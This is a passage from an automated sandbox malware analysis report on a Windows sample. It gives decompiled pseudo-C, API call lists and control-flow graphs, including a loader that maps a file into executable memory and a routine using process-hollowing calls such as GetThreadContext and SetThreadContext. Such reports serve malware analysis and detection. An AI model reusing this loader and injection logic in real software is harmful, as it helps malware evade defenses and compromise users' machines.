                        													} else {
                        														return E010611A0(_t523);
                        													}
                        												} else {
                        													return E010610B0();
                        												}
                        											} else {
                        												return E01061060(_t491, _v40);
                        											}
                        										} else {
                        											_a12 = 0;
                        											_t356 =  *((intOrPtr*)(E010612A0(_v40, "DllRegisterServer",  &_a12)))();
                        											__eflags = _t356;
                        											if(_t356 < 0) {
                        												goto L160;
                        											} else {
                        												_t357 = _a12;
                        												__eflags = _t357;
                        												if(_t357 != 0) {
                        													FreeLibrary(_t357);
                        												}
                        												__eflags = 0;
                        												return 0;
                        											}
                        										}
                        									} else {
                        										0x1060000(_v76, _v16, _v72, _t523);
                        										return _t314;
                        									}
                        								} else {
                        									_t360 = E010615A0(_t491, _t473);
                        									0x1060000(_v16, _v28, _t360, _v68);
                        									return _t360;
                        								}
                        							}
                        						} else {
                        							_t482 = _v16;
                        							_t361 = lstrlenW(_t482);
                        							__eflags = _t361 - 0x26;
                        							if(_t361 != 0x26) {
                        								L161:
                        								0x1060000(_t482, _t523);
                        								_t544 = _t361;
                        								__eflags = _t544 - 2;
                        								if(_t544 != 2) {
                        									goto L160;
                        								} else {
                        									_t362 = E01061860(_t482);
                        									__eflags = _t362;
                        									if(_t362 == 0) {
                        										goto L160;
                        									} else {
                        										0x1060000(_t362, _t523);
                        										return _t362;
                        									}
                        								}
                        							} else {
                        								_t363 =  &_v120;
                        								__imp__CLSIDFromString(_t482, _t363);
                        								asm("sbb eax, eax");
                        								_t361 =  ~_t363 + 1;
                        								__eflags = _t361;
                        								if(_t361 == 0) {
                        									goto L161;
                        								} else {
                        									0x1060000(_t482, 0, 5, _t523);
                        									_t544 = _t361;
                        									L160:
                        									return _t544;
                        								}
                        							}
                        						}
                        					} else {
                        						_t510 =  *(_t473 + 4);
                        						_t447 =  *( *(_t473 + 4)) & 0x0000ffff;
                        						__eflags = _t447 - 0x2f;
                        						if(_t447 == 0x2f) {
                        							L14:
                        							_t449 = E01061960( &(_t510[1]), "Embedding");
                        							__eflags = _t449;
                        							if(_t449 == 0) {
                        								goto L16;
                        							} else {
                        								return E01061700( *((intOrPtr*)(_t473 + 8)));
                        							}
                        						} else {
                        							__eflags = _t447 - 0x2d;
                        							if(_t447 != 0x2d) {
                        								goto L16;
                        							} else {
                        								goto L14;
                        							}
                        						}
                        					}
                        				} else {
                        					_t511 =  *(_t473 + 4);
                        					_t451 =  *( *(_t473 + 4)) & 0x0000ffff;
                        					if(_t451 == 0x2f || _t451 == 0x2d) {
                        						if(E01061960( &(_t511[1]), "@") == 0) {
                        							goto L11;
                        						} else {
                        							if(E01061B50( *((intOrPtr*)(_t473 + 8)),  &_a12,  &_v8) != 0) {
                        								_t522 = _a12;
                        								_t473 = _v8;
                        								goto L11;
                        							} else {
                        								return 1;
                        							}
                        						}
                        					} else {
                        						goto L11;
                        					}
                        				}
                        			}

                        APIs
                        • LoadLibraryW.KERNEL32(Kernel32.dll,GetTickCount), ref: 01061D4A
                        • GetProcAddress.KERNEL32(00000000), ref: 01061D53
                        • LoadLibraryW.KERNEL32(Kernel32.dll,Sleep), ref: 01061D62
                        • GetProcAddress.KERNEL32(00000000), ref: 01061D65
                        • LoadLibraryW.KERNEL32(Kernel32.dll,VirtualAlloc), ref: 01061D73
                        • GetProcAddress.KERNEL32(00000000), ref: 01061D76
                        • Sleep.KERNELBASE(000002BE), ref: 01061D87
                        • GetCommandLineW.KERNEL32(00000000,00000000), ref: 01061E17
                          • Part of subcall function 01063B3A: __wfsopen.LIBCMT ref: 01063B45
                        • _fseek.LIBCMT ref: 01061DA8
                        • _fseek.LIBCMT ref: 01061DBA
                          • Part of subcall function 010633B4: __lock_file.LIBCMT ref: 010633F5
                          • Part of subcall function 010633B4: __fseek_nolock.LIBCMT ref: 01063404
                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 01061DCC
                        • __fread_nolock.LIBCMT ref: 01061DD6
                        • #17.COMCTL32 ref: 01061E07
                        • lstrlenW.KERNEL32(00000000,?,0107B5E4,?,0107B5C4,?,package,?,0107B5B8,?,unreg,?,unregister,?,unregserver,?), ref: 0106202D
                        • _fprintf.LIBCMT ref: 0106207F
                        • lstrlenW.KERNEL32(00000000,?,0107B60C,?,0107B5E4,?,0107B5C4,?,package,?,0107B5B8,?,unreg,?,unregister,?), ref: 010620E4
                          • Part of subcall function 01061960: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01061971
                        • lstrlenW.KERNEL32(00000000,00000000,0107B664,00000000,0107B660,?,0107B60C,?,0107B5E4,?,0107B5C4,?,package,?,0107B5B8,?), ref: 01062250
                        • ExitProcess.KERNEL32 ref: 01062314
                        • lstrlenW.KERNEL32(00000000,00000000,0107B664,00000000,0107B660,?,0107B60C,?,0107B5E4,?,0107B5C4,?,package,?,0107B5B8,?), ref: 01062358
                          • Part of subcall function 010611A0: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000001,00000000,0106273B), ref: 010611AC
                          • Part of subcall function 010611A0: _fprintf.LIBCMT ref: 010611C6
                        • lstrlenW.KERNEL32(00000000), ref: 01062615
                        • CLSIDFromString.OLE32(00000000,?), ref: 01062625
                        • FreeLibrary.KERNEL32(00000000), ref: 010626EE
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: lstrlen$Library$AddressLoadProc$_fprintf_fseek$AllocByteCharCommandExitFreeFromLineManagerMultiOpenProcessSleepStringVirtualWide__fread_nolock__fseek_nolock__lock_file__wfsopen
                        • String ID: ACTION=ADMIN$DllRegisterServer$Embedding$GetTickCount$Kernel32.dll$REBOOTPROMPT="S"$REMOVE=ALL$Sleep$Unknown option "%c" in Advertise mode$Unknown option "%c" in Repair mode$VirtualAlloc$help$package$passive$regserver$uiet$uninstall$unreg$unregister$unregserver$update
                        • API String ID: 826615825-3143363541
                        • Opcode ID: 62b3fd91d5f29b255c6f95933e02c17a4c7d37e09774ff0501d5f3de77ac6885
                        • Instruction ID: 3a5545792dbd3f33e72a8596314ccb8b7aabf99d0f353ffe8543662edae0e76e
                        • Opcode Fuzzy Hash: 62b3fd91d5f29b255c6f95933e02c17a4c7d37e09774ff0501d5f3de77ac6885
                        • Instruction Fuzzy Hash: E252B271E002199BEF20DFA9CC88BAEBBEDAF58344F140495EAC2EB141D775C941CB95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 554 5e08b7-5e09b2 call 5e005f call 5e0838 call 5e0073 * 8 576 5e09b9-5e09c9 554->576 577 5e09b4 554->577 580 5e09cb 576->580 581 5e09d0-5e09f3 CreateFileW 576->581 578 5e0e53-5e0e56 577->578 580->578 582 5e09fa-5e0a20 VirtualAlloc ReadFile 581->582 583 5e09f5 581->583 584 5e0a27-5e0a3a 582->584 585 5e0a22 582->585 583->578 587 5e0e3d-5e0e4c call 5e020a 584->587 588 5e0a40-5e0e38 584->588 585->578 591 5e0e4e-5e0e50 ExitProcess 587->591
                        Memory Dump Source
                        • Source File: 00000001.00000002.261693477.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_5e0000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: AllocNumaVirtual
                        • String ID:
                        • API String ID: 4233825816-0
                        • Opcode ID: 260845a928558d5c3f9686e236e371877df7031ce22453a8b50d5c71c2b894c8
                        • Instruction ID: 3138411a551d9e230a9c6fb403f724126f789a3a9dc8868b5400f0d3e9bdc8f1
                        • Opcode Fuzzy Hash: 260845a928558d5c3f9686e236e371877df7031ce22453a8b50d5c71c2b894c8
                        • Instruction Fuzzy Hash: FA126820C5D2D9ADDF06CBE984557FDBFB09F2A201F0845D6E4E0B5283D17A838ADB25
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 658 5e07da-5e0820 call 5e005f call 5e0073 GetSystemInfo 664 5e0829 658->664 665 5e0822-5e0825 658->665 666 5e082b-5e082e 664->666 665->666
                        APIs
                        • GetSystemInfo.KERNELBASE(?), ref: 005E07F7
                        Memory Dump Source
                        • Source File: 00000001.00000002.261693477.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_5e0000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: InfoSystem
                        • String ID:
                        • API String ID: 31276548-0
                        • Opcode ID: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                        • Instruction ID: afe317e66d0a180c75ff9edf9a600eff4303f91ce10263807c02ac16e49c3779
                        • Opcode Fuzzy Hash: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                        • Instruction Fuzzy Hash: 8EF0A772D1414CAFDB0CE6B9884D6BE7BACEB48300F105569E686E2181D574858082A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 318 5e0e57-5e0f27 call 5e005f call 5e0073 * 7 call 5e0109 CreateFileW 337 5e0f2d-5e0f38 318->337 338 5e1006 318->338 337->338 343 5e0f3e-5e0f4e VirtualAlloc 337->343 339 5e1008-5e100d 338->339 340 5e100f 339->340 341 5e1013-5e1018 339->341 340->341 347 5e1034-5e1037 341->347 343->338 344 5e0f54-5e0f63 ReadFile 343->344 344->338 346 5e0f69-5e0f88 VirtualAlloc 344->346 348 5e0f8a-5e0f9d call 5e00da 346->348 349 5e1002-5e1004 346->349 350 5e101a-5e101e 347->350 351 5e1039-5e103e 347->351 360 5e0f9f-5e0faa 348->360 361 5e0fd8-5e0fe8 call 5e0073 348->361 349->339 353 5e102a-5e102c 350->353 354 5e1020-5e1028 350->354 355 5e104b-5e1053 351->355 356 5e1040-5e1048 VirtualFree 351->356 358 5e102e-5e1031 353->358 359 5e1033 353->359 354->347 356->355 358->347 359->347 362 5e0fad-5e0fd6 call 5e00da 360->362 361->339 367 5e0fea-5e0fef 361->367 362->361 368 5e0ff5-5e1000 VirtualFree 367->368 369 5e0ff1-5e0ff2 FindCloseChangeNotification 367->369 368->347 369->368
                        APIs
                        • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,005E16ED,7FAB7E30), ref: 005E0F1D
                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,005E16ED,7FAB7E30,005E13AB,00000000,00000040), ref: 005E0F47
                        • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,005E16ED,7FAB7E30,005E13AB,00000000), ref: 005E0F5E
                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,005E16ED,7FAB7E30,005E13AB,00000000,00000040), ref: 005E0F80
                        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,005E16ED,7FAB7E30,005E13AB,00000000,00000040,?,00000000,0000000E), ref: 005E0FF2
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,005E16ED,7FAB7E30,005E13AB,00000000,00000040,?), ref: 005E0FFD
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,005E16ED,7FAB7E30,005E13AB,00000000,00000040,?), ref: 005E1048
                        Memory Dump Source
                        • Source File: 00000001.00000002.261693477.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_5e0000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                        • String ID:
                        • API String ID: 656311269-0
                        • Opcode ID: 76098669a522c9ff5f4e6c349c922839456ff10fd15b103bde380ed37331c86f
                        • Instruction ID: 3795111f28a910cf282477c0ab0b654abf0201f5046be50e635e3e3f46ebbf54
                        • Opcode Fuzzy Hash: 76098669a522c9ff5f4e6c349c922839456ff10fd15b103bde380ed37331c86f
                        • Instruction Fuzzy Hash: 4A51C271E00789ABDB24DFB6CC4CBAEBB78BF44710F144515F590FB280E67499818B68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 370 5e020a-5e0225 call 5e005f 373 5e0228-5e022c 370->373 374 5e022e-5e0242 373->374 375 5e0244-5e0251 373->375 374->373 376 5e0254-5e0258 375->376 377 5e025a-5e026e 376->377 378 5e0270-5e027d 376->378 377->376 379 5e0280-5e0284 378->379 380 5e029c-5e037a call 5e0073 * 8 379->380 381 5e0286-5e029a 379->381 398 5e037c-5e0386 380->398 399 5e0391 380->399 381->379 398->399 401 5e0388-5e038f 398->401 400 5e0395-5e03b1 399->400 403 5e03ba 400->403 404 5e03b3-5e03b5 400->404 401->400 406 5e03c1-5e03e9 CreateProcessW 403->406 405 5e0734-5e0737 404->405 407 5e03eb 406->407 408 5e03f0-5e0409 GetThreadContext 406->408 409 5e06e8-5e06ec 407->409 410 5e040b 408->410 411 5e0410-5e042d ReadProcessMemory 408->411 414 5e06ee-5e06f2 409->414 415 5e0731-5e0733 409->415 410->409 412 5e042f 411->412 413 5e0434-5e043d 411->413 412->409 418 5e043f-5e044e 413->418 419 5e0464-5e0483 call 5e129d 413->419 416 5e06f4-5e06ff 414->416 417 5e0705-5e0709 414->417 415->405 416->417 421 5e070b 417->421 422 5e0711-5e0715 417->422 418->419 423 5e0450-5e045d call 5e1208 418->423 429 5e048a-5e04ab call 5e13b7 419->429 430 5e0485 419->430 421->422 426 5e071d-5e0721 422->426 427 5e0717 422->427 423->419 434 5e045f 423->434 431 5e072d-5e072f 426->431 432 5e0723-5e0728 call 5e1208 426->432 427->426 438 5e04ad-5e04b4 429->438 439 5e04f0-5e0510 call 5e13b7 429->439 430->409 431->405 432->431 434->409 441 5e04eb 438->441 442 5e04b6-5e04e2 call 5e13b7 438->442 445 5e0517-5e052c call 5e00da 439->445 446 5e0512 439->446 441->409 449 5e04e9 442->449 450 5e04e4 442->450 452 5e0535-5e053f 445->452 446->409 449->439 450->409 453 5e0571-5e0575 452->453 454 5e0541-5e056f call 5e00da 452->454 456 5e057b-5e0589 453->456 457 5e0655-5e0671 call 5e1056 453->457 454->452 456->457 460 5e058f-5e059d 456->460 464 5e0675-5e0696 SetThreadContext 457->464 465 5e0673 457->465 460->457 463 5e05a3-5e05c3 460->463 466 5e05c6-5e05ca 463->466 468 5e069a-5e06a4 call 5e1157 464->468 469 5e0698 
464->469 465->409 466->457 467 5e05d0-5e05e5 466->467 470 5e05f7-5e05fb 467->470 475 5e06a8-5e06ac 468->475 476 5e06a6 468->476 469->409 472 5e05fd-5e0609 470->472 473 5e0638-5e0650 470->473 477 5e060b-5e0634 472->477 478 5e0636 472->478 473->466 479 5e06ae 475->479 480 5e06b4-5e06b8 475->480 476->409 477->478 478->470 479->480 482 5e06ba 480->482 483 5e06c0-5e06c4 480->483 482->483 484 5e06cc-5e06d0 483->484 485 5e06c6 483->485 486 5e06dc-5e06e2 484->486 487 5e06d2-5e06d7 call 5e1208 484->487 485->484 486->406 486->409 487->486
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.261693477.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_5e0000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID: D
                        • API String ID: 0-2746444292
                        • Opcode ID: 8cd8cc798a2efe8840f445c5d2fd0b61a3e98c3acf1e0788f3e7f507e7bdf1a8
                        • Instruction ID: 2e84e3eaf92fbd8066939574ebefebc0f5c167cd065e4b8f862942b099e73fe8
                        • Opcode Fuzzy Hash: 8cd8cc798a2efe8840f445c5d2fd0b61a3e98c3acf1e0788f3e7f507e7bdf1a8
                        • Instruction Fuzzy Hash: E9020170D00249EFDF18DF95C989BADBBB5FF08304F205059E585AA2A1D7B4AA90DF14
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 489 10630b6-10630cf 490 10630d1-10630d6 489->490 491 10630ec 489->491 490->491 492 10630d8-10630da 490->492 493 10630ee-10630f2 491->493 494 10630f3-10630f8 492->494 495 10630dc-10630e1 call 10647cc 492->495 496 1063106-106310a 494->496 497 10630fa-1063104 494->497 507 10630e7 call 106471d 495->507 500 106310c-1063117 call 1066ce0 496->500 501 106311a-106311c 496->501 497->496 499 106312a-1063139 497->499 505 1063140 499->505 506 106313b-106313e 499->506 500->501 501->495 504 106311e-1063128 501->504 504->495 504->499 509 1063145-106314a 505->509 506->509 507->491 511 1063233-1063236 509->511 512 1063150-1063157 509->512 511->493 513 1063198-106319a 512->513 514 1063159-1063161 512->514 515 1063204-1063205 call 1066b25 513->515 516 106319c-106319e 513->516 514->513 517 1063163 514->517 526 106320a-106320e 515->526 519 10631c2-10631cd 516->519 520 10631a0-10631a8 516->520 521 1063261 517->521 522 1063169-106316b 517->522 529 10631d1-10631d4 519->529 530 10631cf 519->530 527 10631aa-10631b6 520->527 528 10631b8-10631bc 520->528 525 1063265-106326e 521->525 523 1063172-1063177 522->523 524 106316d-106316f 522->524 531 106317d-1063196 call 1066c53 523->531 532 106323b-106323f 523->532 524->523 525->493 526->525 533 1063210-1063215 526->533 534 10631be-10631c0 527->534 528->534 529->532 535 10631d6-10631e2 call 1065573 call 1066e85 529->535 530->529 549 10631f9-1063202 531->549 538 1063251-106325c call 10647cc 532->538 539 1063241-106324e call 1066ce0 532->539 533->532 537 1063217-1063228 533->537 534->529 550 10631e7-10631ec 535->550 544 106322b-106322d 537->544 538->507 539->538 544->511 544->512 549->544 551 10631f2-10631f5 550->551 552 1063273-1063277 550->552 551->521 553 10631f7 551->553 552->525 553->549
                        C-Code - Quality: 72%
                        			E010630B6(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                        				char* _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				void* __ebx;
                        				void* __esi;
                        				signed int _t74;
                        				char _t81;
                        				signed int _t86;
                        				signed int _t88;
                        				signed int _t91;
                        				signed int _t94;
                        				signed int _t97;
                        				signed int _t98;
                        				char* _t99;
                        				signed int _t100;
                        				signed int _t102;
                        				signed int _t103;
                        				signed int _t104;
                        				char* _t110;
                        				signed int _t113;
                        				signed int _t117;
                        				signed int _t119;
                        				void* _t120;
                        
                        				_t99 = _a4;
                        				_t74 = _a8;
                        				_v8 = _t99;
                        				_v12 = _t74;
                        				if(_a12 == 0) {
                        					L5:
                        					return 0;
                        				}
                        				_t97 = _a16;
                        				if(_t97 == 0) {
                        					goto L5;
                        				}
                        				_t124 = _t99;
                        				if(_t99 != 0) {
                        					_t119 = _a20;
                        					__eflags = _t119;
                        					if(_t119 == 0) {
                        						L9:
                        						__eflags = _a8 - 0xffffffff;
                        						if(_a8 != 0xffffffff) {
                        							_t74 = E01066CE0(_t99, 0, _a8);
                        							_t120 = _t120 + 0xc;
                        						}
                        						__eflags = _t119;
                        						if(__eflags == 0) {
                        							goto L3;
                        						} else {
                        							__eflags = _t97 - (_t74 | 0xffffffff) / _a12;
                        							if(__eflags > 0) {
                        								goto L3;
                        							}
                        							L13:
                        							_t117 = _a12 * _t97;
                        							__eflags =  *(_t119 + 0xc) & 0x0000010c;
                        							_t98 = _t117;
                        							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                        								_t100 = 0x1000;
                        							} else {
                        								_t100 =  *(_t119 + 0x18);
                        							}
                        							_v16 = _t100;
                        							__eflags = _t117;
                        							if(_t117 == 0) {
                        								L41:
                        								return _a16;
                        							} else {
                        								do {
                        									__eflags =  *(_t119 + 0xc) & 0x0000010c;
                        									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                        										L24:
                        										__eflags = _t98 - _t100;
                        										if(_t98 < _t100) {
                        											_t81 = E01066B25(_t98, _t119, _t119); // executed
                        											__eflags = _t81 - 0xffffffff;
                        											if(_t81 == 0xffffffff) {
                        												L46:
                        												return (_t117 - _t98) / _a12;
                        											}
                        											_t102 = _v12;
                        											__eflags = _t102;
                        											if(_t102 == 0) {
                        												L42:
                        												__eflags = _a8 - 0xffffffff;
                        												if(__eflags != 0) {
                        													E01066CE0(_a4, 0, _a8);
                        												}
                        												 *((intOrPtr*)(E010647CC(__eflags))) = 0x22;
                        												L4:
                        												E0106471D();
                        												goto L5;
                        											}
                        											_t110 = _v8;
                        											 *_t110 = _t81;
                        											_t98 = _t98 - 1;
                        											_t103 = _t102 - 1;
                        											__eflags = _t103;
                        											_v12 = _t103;
                        											_t100 =  *(_t119 + 0x18);
                        											_v8 = _t110 + 1;
                        											_v16 = _t100;
                        											goto L40;
                        										}
                        										__eflags = _t100;
                        										if(_t100 == 0) {
                        											_t86 = 0x7fffffff;
                        											__eflags = _t98 - 0x7fffffff;
                        											if(_t98 <= 0x7fffffff) {
                        												_t86 = _t98;
                        											}
                        										} else {
                        											__eflags = _t98 - 0x7fffffff;
                        											if(_t98 <= 0x7fffffff) {
                        												_t44 = _t98 % _t100;
                        												__eflags = _t44;
                        												_t113 = _t44;
                        												_t91 = _t98;
                        											} else {
                        												_t113 = 0x7fffffff % _t100;
                        												_t91 = 0x7fffffff;
                        											}
                        											_t86 = _t91 - _t113;
                        										}
                        										__eflags = _t86 - _v12;
                        										if(_t86 > _v12) {
                        											goto L42;
                        										} else {
                        											_push(_t86);
                        											_push(_v8);
                        											_push(E01065573(_t119)); // executed
                        											_t88 = E01066E85(); // executed
                        											_t120 = _t120 + 0xc;
                        											__eflags = _t88;
                        											if(_t88 == 0) {
                        												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
                        												goto L46;
                        											}
                        											__eflags = _t88 - 0xffffffff;
                        											if(_t88 == 0xffffffff) {
                        												L45:
                        												_t64 = _t119 + 0xc;
                        												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
                        												__eflags =  *_t64;
                        												goto L46;
                        											}
                        											_t98 = _t98 - _t88;
                        											__eflags = _t98;
                        											L36:
                        											_v8 = _v8 + _t88;
                        											_v12 = _v12 - _t88;
                        											_t100 = _v16;
                        											goto L40;
                        										}
                        									}
                        									_t94 =  *(_t119 + 4);
                        									_v20 = _t94;
                        									__eflags = _t94;
                        									if(__eflags == 0) {
                        										goto L24;
                        									}
                        									if(__eflags < 0) {
                        										goto L45;
                        									}
                        									__eflags = _t98 - _t94;
                        									if(_t98 < _t94) {
                        										_t94 = _t98;
                        										_v20 = _t98;
                        									}
                        									_t104 = _v12;
                        									__eflags = _t94 - _t104;
                        									if(_t94 > _t104) {
                        										goto L42;
                        									} else {
                        										E01066C53(_v8, _t104,  *_t119, _t94);
                        										_t88 = _v20;
                        										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
                        										_t120 = _t120 + 0x10;
                        										_t98 = _t98 - _t88;
                        										 *_t119 =  *_t119 + _t88;
                        										goto L36;
                        									}
                        									L40:
                        									__eflags = _t98;
                        								} while (_t98 != 0);
                        								goto L41;
                        							}
                        						}
                        					}
                        					_t74 = (_t74 | 0xffffffff) / _a12;
                        					__eflags = _t97 - _t74;
                        					if(_t97 <= _t74) {
                        						goto L13;
                        					}
                        					goto L9;
                        				}
                        				L3:
                        				 *((intOrPtr*)(E010647CC(_t124))) = 0x16;
                        				goto L4;
                        			}

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                        • String ID:
                        • API String ID: 1559183368-0
                        • Opcode ID: 1153b4942f2d5611e78c29060ec963a91ba44f1752b9ca033e549a67a1d6f722
                        • Instruction ID: 47125dbbc1637f519ac1ec5c5d3dfcc313eff5748792c674951d0e5a43ac30be
                        • Opcode Fuzzy Hash: 1153b4942f2d5611e78c29060ec963a91ba44f1752b9ca033e549a67a1d6f722
                        • Instruction Fuzzy Hash: 5D51C630A00706DBEB548FAD88846AE7BF9BF51320F148769E9A99E2D0D7719954CBC0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 592 1063294-10632a8 call 10668f0 595 10632aa-10632ad 592->595 596 10632db 592->596 595->596 598 10632af-10632b4 595->598 597 10632dd-10632e2 call 1066935 596->597 600 10632b6-10632ba 598->600 601 10632e3-10632fa call 1062e2a call 10630b6 598->601 604 10632bc-10632c8 call 1066ce0 600->604 605 10632cb-10632d6 call 10647cc call 106471d 600->605 613 10632ff-1063315 call 106331d 601->613 604->605 605->596 613->597
                        C-Code - Quality: 89%
                        			E01063294(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                        				intOrPtr _t16;
                        				intOrPtr _t19;
                        				intOrPtr _t29;
                        				void* _t32;
                        
                        				_push(0xc);
                        				_push(0x107df58);
                        				E010668F0(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
                        				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
                        					L6:
                        					_t16 = 0;
                        				} else {
                        					_t31 =  *((intOrPtr*)(_t32 + 0x18));
                        					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
                        						E01062E2A(_t31);
                        						 *((intOrPtr*)(_t32 - 4)) = 0;
                        						_t19 = E010630B6( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
                        						_t29 = _t19;
                        						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
                        						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
                        						E0106331D(_t31);
                        						_t16 = _t29;
                        					} else {
                        						_t40 =  *((intOrPtr*)(_t32 + 0xc)) - 0xffffffff;
                        						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
                        							E01066CE0( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc)));
                        						}
                        						 *((intOrPtr*)(E010647CC(_t40))) = 0x16;
                        						E0106471D();
                        						goto L6;
                        					}
                        				}
                        				return E01066935(_t16);
                        			}








                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: __lock_file_memset
                        • String ID:
                        • API String ID: 26237723-0
                        • Opcode ID: 660e7f42421c930f9d35f23e008e9f602f5eb58f0c74b561f98cfdfdde28e04b
                        • Instruction ID: a7b20fa9a7e237559376634ebae80b3eda6d96c59bf69738eb373b42816d8b2e
                        • Opcode Fuzzy Hash: 660e7f42421c930f9d35f23e008e9f602f5eb58f0c74b561f98cfdfdde28e04b
                        • Instruction Fuzzy Hash: 6A018F31D0060BEBCF12AFA98C009DE7FA9FF91360F048255F8A85A160D7328622DFD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 87%
                        			E0106378C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                        				signed int _t12;
                        				signed int _t14;
                        				signed int _t23;
                        				void* _t26;
                        				intOrPtr _t28;
                        
                        				_push(0xc);
                        				_push(0x107df98);
                        				E010668F0(__ebx, __edi, __esi);
                        				_t25 =  *((intOrPtr*)(_t26 + 8));
                        				_t28 =  *((intOrPtr*)(_t26 + 8));
                        				_t29 = _t28 != 0;
                        				if(_t28 != 0) {
                        					E01062E2A(_t25);
                        					_t4 = _t26 - 4;
                        					 *_t4 =  *(_t26 - 4) & 0x00000000;
                        					__eflags =  *_t4;
                        					_t12 = E01063433(__edx, __edi, _t25, _t25); // executed
                        					_t23 = _t12;
